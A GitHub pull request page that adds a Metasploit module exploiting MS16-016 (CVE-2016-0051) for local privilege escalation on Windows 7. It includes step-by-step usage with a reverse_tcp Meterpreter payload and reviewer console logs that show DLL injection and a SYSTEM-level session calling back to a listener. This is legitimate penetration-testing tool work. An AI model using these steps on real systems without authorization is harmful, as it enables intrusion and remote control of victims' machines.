Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add ms16-016 local privilege escalation (originally #6695) #7075

Merged
merged 3 commits into from Jul 6, 2016
Merged

Add ms16-016 local privilege escalation (originally #6695) #7075

merged 3 commits into from Jul 6, 2016

Conversation

wwebb-r7
Copy link
Contributor

@wwebb-r7 wwebb-r7 commented Jul 6, 2016
edited by wchen-r7

Adds module which exploits MS16-016 (CVE-2016-0051). This was originally #6695 - I've had one dead SSD and a lot of drama in between now and then

@sinn3r @OJ tagged as original reviewers

Verification

List the steps needed to make sure this thing works

  • Get a Windows 7 x86 SP1 VM
  • Create a meterpreter payload for the target using msfvenom
  • use exploits/multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • set lhost your_ip_address
  • set lport whatever_port_you_configured_the_payload_with
  • run -j
  • Execute the payload on the target system
  • Verify that you get a meterpreter session going
  • background
  • use exploits/windows/local/ms16_016_webdav
  • set payload windows/meterpreter/reverse_tcp
  • set lhost your_ip_address
  • set lport whatever_port_you_configured_the_payload_with
  • set session whatever_your_meterpreter_session_number_is
  • run

You should see something like this:
ms16

  • Verify that the new session privileges are NT AUTHORITY\SYSTEM via 'getuid' in meterpreter

@wwebb-r7
Copy link
Contributor Author

wwebb-r7 commented Jul 6, 2016
edited

Of course I forget the module docs ... or did I?

wchen-r7
wchen-r7 reviewed Jul 6, 2016
View reviewed changes
modules/exploits/windows/local/ms16_016_webdav.rb
[
[ 'CVE', '2016-0051' ],
[ 'MSB', 'MS16-016' ],
[ 'URL', 'http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0051' ]
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This isn't needed because it's already your first reference :-)

@wchen-r7 wchen-r7 mentioned this pull request Jul 6, 2016
Closed
6 tasks
@wchen-r7 wchen-r7 self-assigned this Jul 6, 2016
@wchen-r7
Copy link
Contributor

wchen-r7 commented Jul 6, 2016

Hmmm it's not working for me:

msf exploit(ms16_016_webdav) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN-6NH0Q8CJQVM
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > background
[*] Backgrounding session 1...
msf exploit(ms16_016_webdav) > show options

Module options (exploit/windows/local/ms16_016_webdav):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.23.1      yes       The listen address
   LPORT     5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 SP1


msf exploit(ms16_016_webdav) > run

[*] Started reverse TCP handler on 172.16.23.1:5555 
[*] Launching notepad to host the exploit...
[+] Process 3384 launched.
[*] Reflectively injecting the exploit DLL into 3384...
[*] Exploit injected ... injecting payload into 3384...
[*] Done.  Verify privileges manually or use 'getuid' if using meterpreter to verify exploitation.
[*] Exploit completed, but no session was created.
msf exploit(ms16_016_webdav) >

@wchen-r7
Copy link
Contributor

wchen-r7 commented Jul 6, 2016

Oh no, never mind. It is working. The firewall blocked it.

@wchen-r7
Copy link
Contributor

wchen-r7 commented Jul 6, 2016 

msf exploit(ms16_016_webdav) > run

[*] Started reverse TCP handler on 172.16.23.1:5555 
[*] Launching notepad to host the exploit...
[+] Process 2124 launched.
[*] Reflectively injecting the exploit DLL into 2124...
[*] Exploit injected ... injecting payload into 2124...
[*] Done.  Verify privileges manually or use 'getuid' if using meterpreter to verify exploitation.
[*] Sending stage (957999 bytes) to 172.16.23.177
[*] Meterpreter session 2 opened (172.16.23.1:5555 -> 172.16.23.177:49589) at 2016-07-06 11:58:12 -0500

meterpreter >

@wchen-r7 wchen-r7 merged commit d923a5d into rapid7:master Jul 6, 2016
wchen-r7 added a commit that referenced this pull request Jul 6, 2016
@wchen-r7
Land #7075, Add ms16-016 local privilege escalation
fee361d
@wchen-r7
Copy link
Contributor

wchen-r7 commented Jul 6, 2016

Release Notes

Add MS16-016 WebDAV null pointer dereference vulnerability - This module allows you to exploit a null pointer deference vulnerability in Windows 7 SP1's WebDAV, and escalate your privilege to SYSTEM.

@OJ
Copy link
Contributor

OJ commented Jul 6, 2016

Nice work! Looks great.

@wchen-r7 wchen-r7 mentioned this pull request Jul 26, 2016
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@wchen-r7 wchen-r7

Labels
docs feature module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@wwebb-r7 @wchen-r7 @OJ